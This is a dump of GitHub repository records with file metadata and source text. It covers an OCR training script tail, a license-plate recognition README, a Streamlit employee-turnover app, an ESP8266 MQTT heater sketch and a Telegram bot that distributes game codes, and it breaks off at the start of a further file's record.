(1, target.shape[-1]))\n target_char = tf.argmax(target_char, axis=1)\n # print(2, target_char.eval())\n partial_loss = loss_function(target_char, predictions)\n loss += partial_loss\n # Using teacher forcing\n dec_input = tf.expand_dims(target_char, 1)\n total_loss = (loss / sentence_len)\n trainable_variables = encoder.trainable_variables + decoder.trainable_variables\n gradients = tape.gradient(loss, trainable_variables)\n optimizer.apply_gradients(zip(gradients, trainable_variables))\n return loss, total_loss\n\n epochs = 20\n\n dsize = params['dsize']\n model_params = params['model_params']\n in_folder = params['input_folder']\n alphabet = params['alphabet']\n #\n in_channels = model_params['in_channels']\n out_channels = model_params['out_channels']\n metadata = get_plates_text_metadata(params)\n metadata.file_name = 'plate_' + metadata.file_name\n metadata.file_name = metadata.file_name.str.split('.').str[0] + '.png'\n train_meta = metadata.query(\"set == 'train'\")\n train_meta = set_index(train_meta)\n model, preprocess_input = get_model_definition(**model_params)\n f_train_params = {\n 'folder': in_folder, 'metadata': train_meta, 'dsize': dsize,\n 'in_channels': in_channels, 'out_channels': out_channels,\n 'alphabet': alphabet\n }\n data_train = ImageTextLabelGenerator(get_image_text_label, preprocess_input, f_train_params)\n for epoch in range(0, epochs):\n total_loss = 0\n for batch, (img_tensor, target) in enumerate(data_train):\n batch_loss, t_loss = train_step(img_tensor, target)\n total_loss += t_loss\n # logger.info(f\"target.mean(): {target.mean()}\")\n loss_debug = batch_loss.numpy() / int(target.shape[1])\n logger.info(f'Epoch {epoch + 1} Batch {batch} Loss {loss_debug}')\n # Storing the epoch end loss value to plot later\n loss_plot.append(total_loss / num_steps)\n logger.info(f'Epoch {epoch + 1} Loss {total_loss / num_steps}')\n\n\nif __name__ == \"__main__\":\n train_ocr_model(get_params())\n"
},
{
"alpha_fraction": 0.8129032254219055,
"alphanum_fraction": 0.8129032254219055,
"avg_line_length": 29.799999237060547,
"blob_id": "cb35e2f8566eb12a9d0b9fe8aa433dd5acc27e2b",
"content_id": "7e7bc5a3db448bca39b2fee966d33b5131be9bba",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 155,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 5,
"path": "/README.md",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "# Pedro\nPedro: PlatE Detection and RecOgnition\n\nHere is a post explaining the project:\nhttps://sebacepeda.com/blog/license-plate-segmentation-recognition\n\n"
}
] | 29 |
MamiyaA/DataScience-Fellow
|
https://github.com/MamiyaA/DataScience-Fellow
|
71837a2cf5560a6951f9ccd9c021dc062d7cb71f
|
917118e570078055e8be203cea96f9af64891feb
|
96104e9e5aa8043a79e77cd00c244463e1851020
|
refs/heads/master
| 2020-12-20T13:03:17.742683 | 2020-10-09T06:22:16 | 2020-10-09T06:22:16 | 236,084,711 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7176221013069153,
"alphanum_fraction": 0.7448248267173767,
"avg_line_length": 35.39613342285156,
"blob_id": "ab384d550f91397437ab5f9bb29ea5303041491f",
"content_id": "8dee5bd6e4317fb9ab8cc03f02fa2fc77a35b6dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7536,
"license_type": "no_license",
"max_line_length": 243,
"num_lines": 207,
"path": "/FeaturePredictionForTurnover_Streamlit.py",
"repo_name": "MamiyaA/DataScience-Fellow",
"src_encoding": "UTF-8",
"text": "#import necessary packages\n#for the web app\nimport streamlit as st\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nsb.set()\ncolor = sb.color_palette()\nimport matplotlib as mpl\nimport pickle\nfrom sklearn import preprocessing as pp \nfrom sklearn import linear_model\nfrom sklearn.linear_model import Lasso\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import r2_score\nfrom scipy.stats import pearsonr \nfrom sklearn.decomposition import PCA\nfrom sklearn.linear_model import LassoCV\nfrom scipy.stats import wilcoxon\n\n#title of the app\nst.title('Top 3 features predicting employee turnover')\n\n# Loading data\nwith open('lasso_output.pickle', 'rb') as f: \n test_r_squared, lasso_alpha, lasso_coef = pickle.load(f)\n\nwith open('scaler.pickle', 'rb') as f: \n scalerEmployeeResponse, scalerOccupancyTurnover = pickle.load(f)\n\nwith open('original_values.pickle', 'rb') as f: \n TurnOver2, dataX2 = pickle.load(f)\n\nwith open('linear_output.pickle', 'rb') as f: \n linear_r_squared_df, linear_coef_df = pickle.load(f)\n\n#loading the dataframe\nfeature_set = pd.read_pickle(\"./feature_set.pkl\")\nturnOverRate = pd.read_pickle(\"./turnOverRate.pkl\")\nLocationCodeComprehensive = pd.read_pickle(\"./LocationCodeComprehensive.pkl\")\nlocation_pay = pd.read_pickle(\"./location_pay.pkl\")\nlocation_sd = pd.read_pickle(\"./location_sdS_df.pkl\")\nlasso_r_squared_df = pd.read_pickle(\"./lasso_r_squared_1000.pkl\")\nlasso_alpha_df = pd.read_pickle(\"./lasso_alpha_1000.pkl\")\nlasso_coef_df = pd.read_pickle(\"./lasso_coef_1000.pkl\")\nselected_features_interaction = pd.read_pickle(\"./selected_features_interaction.pkl\")\n\n#Rename the column\nLocationCodeComprehensive.rename(columns = {'Unnamed: 2':'location code'}, inplace = True) \n\n#Calculate mean\nmean_coef=lasso_coef_df.mean()\n\n#Chose top coefficients.\nabs_mean_coef=abs(mean_coef)\ntop_coef=abs_mean_coef.sort_values(ascending=False)\n\n#Put features together\nall_features = pd.concat([feature_set,location_pay,location_sd], axis = 1)\n\n#Side bar with choice of location\nlocation = st.sidebar.selectbox(\n 'Select your location',\n LocationCodeComprehensive)\n\n#Index for current location\nindex = LocationCodeComprehensive==location\n\nselected_features_interaction2=pd.DataFrame(data=selected_features_interaction)\nx_linear = selected_features_interaction\n\n#Calculate the mean for the coefficients\nmean_linear_coef=linear_coef_df.mean()\n\nPredictionMatrix=x_linear.multiply(mean_linear_coef)\nPredictionValue=PredictionMatrix.sum(axis=1)\n\n#User chose how much to reduce, figure out how much do we need to reduce in the log transformed scaled unit.\nTurnOver2=TurnOver2.reset_index(drop=True)\ndataX2=dataX2.reset_index(drop=True)\ndataX2.columns = range(dataX2.shape[1])\nbase_turnover=TurnOver2[index]\n\nmean_coef_reduced = mean_linear_coef.apply(lambda x: round(x, 2 - int(np.floor(np.log10(abs(x))))))\n\nst.subheader(\"Feature 55: Provide excellent service\")\nst.write(mean_coef_reduced[0])\n\nst.subheader(\"Feature 62: Chef's tenure\")\nst.write(mean_coef_reduced[1])\n\nst.subheader(\"Feature 21: Managers avoid playing favorites\")\nst.write(mean_coef_reduced[2])\n\nst.markdown('***')\n\nst.subheader(\"Current and target turnover rate for your location (%)\")\n\n\n#slider for choosing the goal turnover rate\nnew_turnover = st.slider('Goal turn over rate (%)', 0, 400, 100)\nnew_turnover = new_turnover/100\n\n#Plot the current and target turnover rate\nfig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)\nsb.barplot(TurnOver2[index]*100, orient = 'v', ax =ax1)\nax1.set_ylabel('turnover rate (%)')\nax1.set_xlabel('current')\nax1.set_ylim((0,400)) \nsb.barplot(new_turnover*100, orient = 'v', color = 'red', ax = ax2)\nax2.set_xlabel('target')\nst.pyplot()\n\n\n#new_turnover = base_turnover*(1-(percent_turnover/100))\nlog_new_turnover = np.log(new_turnover+0.1)\nscaled_turnover = (log_new_turnover-scalerOccupancyTurnover.mean_[1])/scalerOccupancyTurnover.scale_[1]\n\ncurrent_turnover = turnOverRate[index]\nturnover_change = scaled_turnover-current_turnover\n#currently assumes we use the top component and have selected 3 features.\nfeature_change = turnover_change/(mean_linear_coef[0]+mean_linear_coef[3]*selected_features_interaction2.loc[LocationCodeComprehensive==location,1]+mean_linear_coef[4]*selected_features_interaction2.loc[LocationCodeComprehensive==location,2])\n\n#bring it back to what it means in the raw data scale. The raw value of the feature has to be between 0 and 1.\nnew_feature = selected_features_interaction2.loc[LocationCodeComprehensive==location,0]+feature_change\n\nnew_feature_before_scale = (new_feature*scalerEmployeeResponse.scale_[55])+scalerEmployeeResponse.mean_[55]\nnew_feature_before_transform = 1.1-np.exp(0.1-new_feature_before_scale)\ncurrent_feature = dataX2.loc[LocationCodeComprehensive==location,55]\n\nst.markdown('***')\n\nst.subheader(\"Current and target scores for the (Q55: Provide excellent service)\")\n\n#Plot the current and target score\nfig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)\n#current score\nsb.barplot(current_feature.iloc[0], orient = 'v', ax =ax1)\nax1.set_ylabel('score (Q55) (%)')\nax1.set_xlabel('current')\nax1.set_ylim((0,1)) \n\n#TargetScore\n#need to check if we reached the limit (score must be between 0 and 1)\nTargetScore = new_feature_before_transform.iloc[0]\nif TargetScore >= 0 and TargetScore <= 1:\n sb.barplot(TargetScore, orient = 'v', color = 'red', ax = ax2)\n ax2.set_xlabel('target')\n st.pyplot()\nelif TargetScore < 0:\n sb.barplot(0, orient = 'v', color = 'red', ax = ax2)\n ax2.set_xlabel('target')\n st.pyplot()\n\n st.write('Target score = 0 reached score limit')\nelif TargetScore > 1:\n sb.barplot(1, orient = 'v', color = 'red', ax = ax2)\n ax2.set_xlabel('target')\n st.pyplot()\n\n st.write('Target score = 1 reached score limit')\n\n\n\nst.markdown('***')\n#have option for the 2nd question.\nfeature_change2 = turnover_change/(mean_linear_coef[2]+mean_linear_coef[4]*selected_features_interaction2.loc[LocationCodeComprehensive==location,0]+mean_linear_coef[5]*selected_features_interaction2.loc[LocationCodeComprehensive==location,1])\n\n#bring it back to what it means in the raw data scale. The raw value of the feature has to be between 0 and 1.\nnew_feature2 = selected_features_interaction2.loc[LocationCodeComprehensive==location,2]+feature_change2\n\nnew_feature_before_scale2 = (new_feature2*scalerEmployeeResponse.scale_[21])+scalerEmployeeResponse.mean_[21]\nnew_feature_before_transform2 = 1.1-np.exp(0.1-new_feature_before_scale2)\ncurrent_feature2 = dataX2.loc[LocationCodeComprehensive==location,21]\n\n\nst.subheader(\"Current and target scores for the (Q21: Managers avoid playing favorites)\")\n\n#Plot the current and target score\nfig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)\n#current score\nsb.barplot(current_feature2.iloc[0], orient = 'v', ax =ax1)\nax1.set_ylabel('score (Q21) (%)')\nax1.set_xlabel('current')\nax1.set_ylim((0,1)) \n\n#TargetScore\n#need to check if we reached the limit (score must be between 0 and 1)\nTargetScore2 = new_feature_before_transform2.iloc[0]\nif TargetScore2 >= 0 and TargetScore2 <= 1:\n sb.barplot(TargetScore2, orient = 'v', color = 'red', ax = ax2)\n ax2.set_xlabel('target')\n st.pyplot()\nelif TargetScore2 < 0:\n sb.barplot(0, orient = 'v', color = 'red', ax = ax2)\n ax2.set_xlabel('target')\n st.pyplot()\n\n st.write('Target score = 0 reached score limit')\nelif TargetScore2 > 1:\n sb.barplot(1, orient = 'v', color = 'red', ax = ax2)\n ax2.set_xlabel('target')\n st.pyplot()\n\n st.write('Target score = 1 reached score limit')\n\n\n"
},
{
"alpha_fraction": 0.8158971071243286,
"alphanum_fraction": 0.8188194036483765,
"avg_line_length": 76.7727279663086,
"blob_id": "1227ca62df6f2492bb073d62773a1b4d46bc5538",
"content_id": "1f756f0ee3cc14d6bf844436cec2a1af9f93c092",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1719,
"license_type": "no_license",
"max_line_length": 327,
"num_lines": 22,
"path": "/README.md",
"repo_name": "MamiyaA/DataScience-Fellow",
"src_encoding": "UTF-8",
"text": "# FeatureFinder\n\n\nData exploration and pre-processing:\n\nDataExplorationAndPreProcessing.ipynb: Load the employee turnover rate, employee’s answers to the questions, tenure of key positions, and median household income for the location (from US Census). Transform the data to make it normally distributed, standardize the data, save the data.\n\nAddingEmployeeSalary.ipynb: Load the salary for each employee and calculate the median salary for each location. Standardize the data and save it.\n\nAddingResponseStandardDeviation.ipynb: Load the individual employee’s answers to the questions and calculate how varied the responses are at each location. Standardize and save it.\n\nRegression Analysis:\n\nRun_LassoRegression_and_Average.ipynb: Load all the features saved by the notebooks above, and run Lasso regression (1000 times). Produce a model that predicts employee turnover rate using few selected features. Save the results for linear regression step.\n\nLinearRegressionWithInteractions.ipynb: Load the results of the lasso regression. Choose the top 3 features and run linear regression using these features and their interactions. A model confirms the validity of the features and shows that interactions are not significantly big. Save the results for the use in Streamlit app. \n\nInteractive Web App:\n\nFeaturePredictionForTurnover_Streamlit.py: A Python script for \"Streamlit\" Web app. The app will interactively show how much each senior care center has to improve on key features in order to meet their \"target\" emplyee turn over rate.\n\nFor running the Web App, please install “Streamlit” from (https://www.streamlit.io/), and run the file by typing: streamlit run FeaturePredictionForTurnover_Streamlit.py\n"
}
] | 2 |
VovaSheliag/Bot
|
https://github.com/VovaSheliag/Bot
|
c74903c46363fb7940fadcfc5d56adc1bad6bd85
|
fd3d077a17398b1a2d9fd6a1769d09e155abb994
|
3d5f326452eddcff35236afd37dc340e1bf73300
|
refs/heads/main
| 2023-07-25T18:12:44.457591 | 2021-09-07T08:21:50 | 2021-09-07T08:21:50 | 403,898,719 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.47836539149284363,
"alphanum_fraction": 0.7019230723381042,
"avg_line_length": 15.640000343322754,
"blob_id": "76d8c9b6dd37bc5af68f9e5d53fbc3e247c31574",
"content_id": "ee59384e1641c2d4916a372ee53796860a07bba6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 416,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 25,
"path": "/requirements.txt",
"repo_name": "VovaSheliag/Bot",
"src_encoding": "UTF-8",
"text": "attrs==21.2.0\ncertifi==2021.5.30\ncffi==1.14.6\nchardet==4.0.0\ncryptography==3.4.7\ngreenlet==1.1.0\nidna==2.10\niniconfig==1.1.1\npackaging==21.0\npluggy==0.13.1\npy==1.10.0\npyasn1==0.4.8\npyasn1-modules==0.2.8\npycparser==2.20\npyOpenSSL==20.0.1\npyparsing==2.4.7\npyTelegramBotAPI==3.7.6\npytest==6.2.4\nrequests==2.25.1\nservice-identity==21.1.0\nsix==1.16.0\nSQLAlchemy==1.4.22\nTelegramBotAPI==0.3.2\ntoml==0.10.2\nurllib3==1.26.6\n"
},
{
"alpha_fraction": 0.6241829991340637,
"alphanum_fraction": 0.6392659544944763,
"avg_line_length": 32.42856979370117,
"blob_id": "13aeb81b2e363ab55ee23be4c7f560484019d17f",
"content_id": "60c98d320ffd4fcbee14c61719f472d2a5444d76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4427,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 119,
"path": "/main.py",
"repo_name": "VovaSheliag/Bot",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport telebot\nimport re\nimport sqlite3\n\nbot = telebot.TeleBot(\"Token\")\npassword = '*******'\nchat_observe = False\nsend_null_codes_info = False\n\ndb = sqlite3.connect('user_db.db', check_same_thread=False)\nsql = db.cursor()\n\n\[email protected]_handler(commands=['start'])\ndef send_welcome(message):\n bot.send_message(message.from_user.id, f'Welcome {message.from_user.first_name}')\n\n\[email protected]_handler(commands=['uploadcodes'])\ndef upload_codes(message):\n global chat_observe, send_null_codes_info\n upload_pass = message.text.replace('/uploadcodes ', '').strip().split('\\n')[0]\n if upload_pass.replace(' ', '') == password:\n restart()\n codes = re.findall(r'\\w{5}-\\w{5}-\\w{5}-\\w{5}-\\w{5}', message.text.replace('/uploadcodes a7H6BvF66b', ''))\n while '' in codes:\n codes.remove('')\n if len(codes) > 100:\n bot.send_message(message.chat.id, 'Ошибка, можно загружать только 100 кодов')\n return 0\n for i in range(len(codes)):\n add_code(codes[i])\n if len(codes) == 0:\n return 0\n bot.send_message(-1001259856561, \"\"\"Доступны коды для арены! Чтобы получить код:\n 1. Напишите в личные сообщения чат-боту mw_arena_bot “/start”. Достаточно сделать это всего один раз, потом этот шаг можно пропускать.\n 2. Напишите в в личные сообщения боту команду /getcode\n 3. Один человек может получить один код\n \"\"\")\n chat_observe = False\n else:\n bot.send_message(message.chat.id, \"Неправильный пароль\")\n\n\[email protected]_handler(commands=['getcode'])\ndef get_code(message):\n global chat_observe, send_null_codes_info\n if len(db_codes().fetchall()) == 0:\n bot.send_message(message.from_user.id, 'Уже все коды разобрали, но я сообщу если будут еще')\n if not chat_observe:\n bot.send_message(-1001259856561, 'На сегодня всё, все коды разобрали, но я сообщу если будут еще')\n chat_observe = True\n return 0\n if (check_user_not_in_db(message.from_user.id)) and (message.chat.id == message.from_user.id):\n bot.send_message(message.from_user.id, get_db_code(message.from_user.id))\n elif check_user_in_db(message.from_user.id):\n bot.send_message(message.chat.id, 'ЕДХ - лучший формат магии, приходите в пятницу на вечер коммандера')\n elif message.chat.id != message.from_user.id:\n bot.send_message(message.chat.id, '/getcode работает только в личном чате с ботом')\n\n\[email protected]_handler(commands=['deletecodes'])\ndef deletecodes(message):\n sql = db.cursor()\n delete_pass = message.text.replace('/deletecodes', '').replace(' ', '').strip().split('\\n')[0]\n if delete_pass == password:\n sql.execute(\"DELETE FROM codes\")\n db.commit()\n bot.send_message(message.chat.id, 'Коды удалены')\n else:\n bot.send_message(message.chat.id, 'Неправильный пароль')\n\n\ndef restart():\n global chat_observe\n sql.execute(\"DELETE FROM users\")\n db.commit()\n sql.execute(\"DELETE FROM codes\")\n db.commit()\n chat_observe = False\n\n\ndef get_db_code(user_id):\n code = sql.execute(f\"SELECT code FROM codes LIMIT 1\").fetchall()[0][0]\n db.commit()\n sql.execute(\"DELETE from codes LIMIT 1\")\n db.commit()\n sql.execute(f\"INSERT INTO users VALUES({user_id})\")\n db.commit()\n return code\n\n\ndef add_code(code):\n sql.execute(f\"INSERT INTO codes VALUES(?)\", (code,))\n db.commit()\n\n\ndef all_users():\n users = sql.execute(\"\"\"SELECT * FROM users\"\"\")\n db.commit()\n return users\n\n\ndef check_user_not_in_db(user_id):\n return len(sql.execute(f\"\"\"SELECT user_id FROM users WHERE user_id={user_id}\"\"\").fetchall()) == 0\n\n\ndef check_user_in_db(user_id):\n return len(sql.execute(f\"\"\" SELECT user_id FROM users WHERE user_id={user_id}\"\"\").fetchall()) == 1\n\n\ndef db_codes():\n db_codes = sql.execute(\"\"\"SELECT * FROM codes\"\"\")\n db.commit()\n return db_codes\n\n\nbot.polling(none_stop=True)\n"
}
] | 2 |
luckynwj7/SpamProject
|
https://github.com/luckynwj7/SpamProject
|
ec5cb830af544e96cefd0314cc4324af0f112def
|
6b4d5bc4c1aebbe017dc9d7de3f197710db1b7e2
|
994718d4a744031fef5293ab2a470e5aa4086043
|
refs/heads/master
| 2020-09-22T12:46:26.562141 | 2019-12-03T11:34:26 | 2019-12-03T11:34:26 | 225,201,179 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6046025156974792,
"alphanum_fraction": 0.6046025156974792,
"avg_line_length": 23.157894134521484,
"blob_id": "6f84ab5d15442490f77da59eff7d50d1858ef46f",
"content_id": "e0a363fbfebc799991a585e87be5983db48cba25",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 516,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 19,
"path": "/SpamExamplePredict.py",
"repo_name": "luckynwj7/SpamProject",
"src_encoding": "UTF-8",
"text": "import pickle\r\n\r\nwith open('./model/spam_mail_filter.model', 'rb') as file:\r\n spamFilterModel = pickle.load(file)\r\n \r\n\r\nprint(\"스팸메일 아닌 예시\")\r\nhamExam = open(\"./example/hamExam.txt\", 'r').read()\r\nprint(hamExam)\r\npre = spamFilterModel.predict(hamExam)\r\nprint(\"결과 =\", pre)\r\n\r\nprint(\"-----------------------------------\")\r\n\r\nprint(\"스팸메일인 예시\")\r\nspamExam = open(\"./example/spamExam.txt\", 'r').read()\r\nprint(spamExam)\r\npre = spamFilterModel.predict(spamExam)\r\nprint(\"결과 =\", pre)\r\n"
},
{
"alpha_fraction": 0.6695652008056641,
"alphanum_fraction": 0.6695652008056641,
"avg_line_length": 21,
"blob_id": "ed3fd4d00dfaef35afa264dcb14512da17b22247",
"content_id": "efcf512f8c40eb6929360eeeb509e1171a6a316a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 258,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 10,
"path": "/SpamFilterExec.py",
"repo_name": "luckynwj7/SpamProject",
"src_encoding": "UTF-8",
"text": "import pickle\r\n\r\nwith open('./model/spam_mail_filter.model', 'rb') as file:\r\n spamFilterModel = pickle.load(file)\r\n\r\n \r\nprint(\"검사할 내용을 입력해주세요\")\r\ncontents=input()\r\npre = spamFilterModel.predict(contents)\r\nprint(\"결과 =\", pre)\r\n"
},
{
"alpha_fraction": 0.6039999723434448,
"alphanum_fraction": 0.6200000047683716,
"avg_line_length": 19.23404312133789,
"blob_id": "d0ff67e6a8d737251dd30c5257ad97570b6069e9",
"content_id": "3b726a7cb7de62c2989c4a23cfa41be92a15227c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1106,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 47,
"path": "/SpamFilterFit.py",
"repo_name": "luckynwj7/SpamProject",
"src_encoding": "UTF-8",
"text": "from SpamFilterClass import SpamMailFilter\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nimport csv, codecs\r\nimport pandas as pd\r\nimport pickle\r\n\r\n\r\n\r\n# 클래스 사용하기 \r\nsFilter = SpamMailFilter()\r\n\r\n# CSV 파일 열기\r\nfilePath = \"./dataset/spam.csv\"\r\nfp = codecs.open(filePath, \"r\", \"utf-8\")\r\n# 한 줄씩 읽어 들이기\r\nreader = csv.reader(fp, delimiter=\",\", quotechar='\"')\r\n\r\n# pandas 데이터 프레임에 입력하기\r\ndf=pd.DataFrame({\"text\":[0], \"category\":[0]})\r\ni=0\r\nfor cells in reader:\r\n df.loc[i]=(cells[1], cells[0])\r\n i+=1\r\n\r\n# 데이터 나누기\r\ntrain, test = train_test_split(df, test_size=0.2, random_state=123)\r\n\r\n# 학습\r\nfor idx in train.index:\r\n sFilter.fit(train[\"text\"][idx], train[\"category\"][idx])\r\n\r\n# 모델 생성\r\nwith open('./model/spam_mail_filter.model', 'wb') as file:\r\n pickle.dump(sFilter, file)\r\nprint(\"모델 생성 완료\")\r\n\r\n \r\n# 예측\r\nok=0\r\ncase=0\r\nfor idx in test.index:\r\n case+=1\r\n pre = sFilter.predict(test[\"text\"][idx])\r\n if test[\"category\"][idx]==pre:\r\n ok+=1\r\nprint(\"정확도 : \", ok/case)\r\n\r\n"
}
] | 3 |
jdawson91/MQTT-esp8266
|
https://github.com/jdawson91/MQTT-esp8266
|
19af9b1ff95b17b9c8932e646729da5f971dfed8
|
e59e7e911633dac311a33f2c62a7910d019de829
|
327dd1fb40a036d123fddbe8a4ad582c24877f92
|
refs/heads/master
| 2021-01-10T08:55:39.049414 | 2016-04-22T10:46:58 | 2016-04-22T10:46:58 | 52,673,909 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.58670574426651,
"alphanum_fraction": 0.6054741144180298,
"avg_line_length": 25.50259017944336,
"blob_id": "bec52d9478d411343299523c2a0396b71f9b7caf",
"content_id": "29575628b7a86de7e2e8a7559b5a4babbca2bdf8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5115,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 193,
"path": "/sketch_feb17a.ino",
"repo_name": "jdawson91/MQTT-esp8266",
"src_encoding": "UTF-8",
"text": "#include <DallasTemperature.h>\n#include <OneWire.h>\n#include <ESP8266WiFi.h>\n#include \"Adafruit_MQTT.h\"\n#include \"Adafruit_MQTT_Client.h\"\n\n/****************************** Heater Pins ******************************************/\nint Heater[] = {2, 5, 4};\n\n/****************************** Temp ******************************************/\n#define REPORT_INTERVAL 10 // in sec\n#define NO_SENSORS 3\n#define ONE_WIRE_BUS 13 // DS18B20 pin\nOneWire oneWire(ONE_WIRE_BUS);\nDallasTemperature DS18B20(&oneWire);\n\n/************************* WiFi Access Point *********************************/\n\n#define WLAN_SSID \"NETGEAR\"\n#define WLAN_PASS \"def4543aa3\"\n\n/************************* MQTT Setup *********************************/\n\n#define AIO_SERVER \"192.168.3.13\"\n#define AIO_SERVERPORT 1883\n#define AIO_USERNAME \"\"\n#define AIO_KEY \"\"\n\n/**************** Global State (default settings) **********************/\n\n// Create an ESP8266 WiFiClient class to connect to the MQTT server.\nWiFiClient client;\n\n// Store the MQTT server, client ID, username, and password in flash memory.\n// This is required for using the Adafruit MQTT library.\nconst char MQTT_SERVER[] PROGMEM = AIO_SERVER;\n// Set a unique MQTT client ID using the AIO key + the date and time the sketch\n// was compiled (so this should be unique across multiple devices for a user,\n// alternatively you can manually set this to a GUID or other random value).\nconst char MQTT_CLIENTID[] PROGMEM = __TIME__ AIO_USERNAME;\nconst char MQTT_USERNAME[] PROGMEM = AIO_USERNAME;\nconst char MQTT_PASSWORD[] PROGMEM = AIO_KEY;\n\n// Setup the MQTT client class by passing in the WiFi client and MQTT server and login details.\nAdafruit_MQTT_Client mqtt(&client, MQTT_SERVER, AIO_SERVERPORT, MQTT_CLIENTID, MQTT_USERNAME, MQTT_PASSWORD);\n\n\n/****************************** Feeds ***************************************/\n\n// Setup a feed called 'heaters' for subscribing to changes.\n// Notice MQTT paths for AIO follow the form: <username>/feeds/<feedname>\nconst char HEATER_FEED[] PROGMEM = \"HEATER_FEED\";\nAdafruit_MQTT_Subscribe heaters = Adafruit_MQTT_Subscribe(&mqtt, HEATER_FEED);\n\n\n\n// function prototypes\nvoid connect(void);\nvoid getTemps();\nvoid sendTeperature(float temp, int i);\nvoid controlHeaters(char *value);\n\n//setup\nvoid setup() {\n for (int i = 0; i < sizeof(Heater) - 1; i++) {\n pinMode(Heater[i], OUTPUT);\n }\n\n Serial.begin(115200);\n\n // Connect to WiFi access point.\n Serial.println(); Serial.println();\n delay(10);\n Serial.print(F(\"Connecting to \"));\n Serial.println(WLAN_SSID);\n\n WiFi.begin(WLAN_SSID, WLAN_PASS);\n while (WiFi.status() != WL_CONNECTED) {\n delay(500);\n Serial.print(F(\".\"));\n }\n Serial.println();\n\n Serial.println(F(\"WiFi connected\"));\n Serial.println(F(\"IP address: \"));\n Serial.println(WiFi.localIP());\n\n // listen for events on the feeds\n mqtt.subscribe(&heaters);\n\n // connect to adafruit io\n connect();\n\n}\n\n\n\n//main\nvoid loop() {\n Adafruit_MQTT_Subscribe *subscription;\n\n // ping adafruit io a few times to make sure we remain connected\n if (! mqtt.ping(3)) {\n // reconnect to adafruit io\n if (! mqtt.connected())\n connect();\n }\n\n // this is our 'wait for incoming subscription packets' busy subloop\n while (subscription = mqtt.readSubscription(1000)) {\n\n if (subscription == &heaters) {\n // convert mqtt ascii payload to int\n char *value = (char *)heaters.lastread;\n Serial.print(F(\"Received: \"));\n Serial.println(value);\n\n int i = value[1] - 48;\n if (i == 9) {\n getTemps();\n } else {\n controlHeaters(value);\n }\n }\n }\n}\n\n\n\nvoid getTemps() {\n float temp;\n for (int i = 0; i < NO_SENSORS; i++) {\n do {\n DS18B20.requestTemperatures();\n temp = DS18B20.getTempCByIndex(i);\n } while (temp == 85.0 || temp == (-127.0));\n sendTeperature(temp, i);\n }\n\n\n}\n\nvoid sendTeperature(float temp, int i) {\n Serial.print(\"Sensor \");\n Serial.print(i);\n Serial.print(\" Temperature: \");\n Serial.println(temp);\n String topic = \"sensor\";\n topic += i;\n char* result;\n //sprintf(result, \"%f\", temp);\n mqtt.publish(topic.c_str(), String(temp).c_str(), 0);\n\n}\n\nvoid controlHeaters(char *value) {\n int i = value[0] - 48;\n int current = value[1] - 48;\n\n // write the current state to the power switch tail\n digitalWrite(Heater[i], current == 1 ? HIGH : LOW);\n}\n\n// connect to Pi io via MQTT\nvoid connect() {\n\n Serial.print(F(\"Connecting to Pi... \"));\n\n int8_t ret;\n\n while ((ret = mqtt.connect()) != 0) {\n\n switch (ret) {\n case 1: Serial.println(F(\"Wrong protocol\")); break;\n case 2: Serial.println(F(\"ID rejected\")); break;\n case 3: Serial.println(F(\"Server unavail\")); break;\n case 4: Serial.println(F(\"Bad user/pass\")); break;\n case 5: Serial.println(F(\"Not authed\")); break;\n case 6: Serial.println(F(\"Failed to subscribe\")); break;\n default: Serial.println(F(\"Connection failed\")); break;\n }\n\n if (ret >= 0)\n mqtt.disconnect();\n\n Serial.println(F(\"Retrying connection...\"));\n delay(5000);\n\n }\n\n Serial.println(F(\"Pi Connected!\"));\n\n}\n"
},
{
"alpha_fraction": 0.6162790656089783,
"alphanum_fraction": 0.6339213848114014,
"avg_line_length": 30.8157901763916,
"blob_id": "9eeed3103c9a0aa24e368d0e92cfd10fbdfd5e42",
"content_id": "28a571653df6ab6a58c95598f8fdefb670a02f55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2494,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 76,
"path": "/piserver.py",
"repo_name": "jdawson91/MQTT-esp8266",
"src_encoding": "UTF-8",
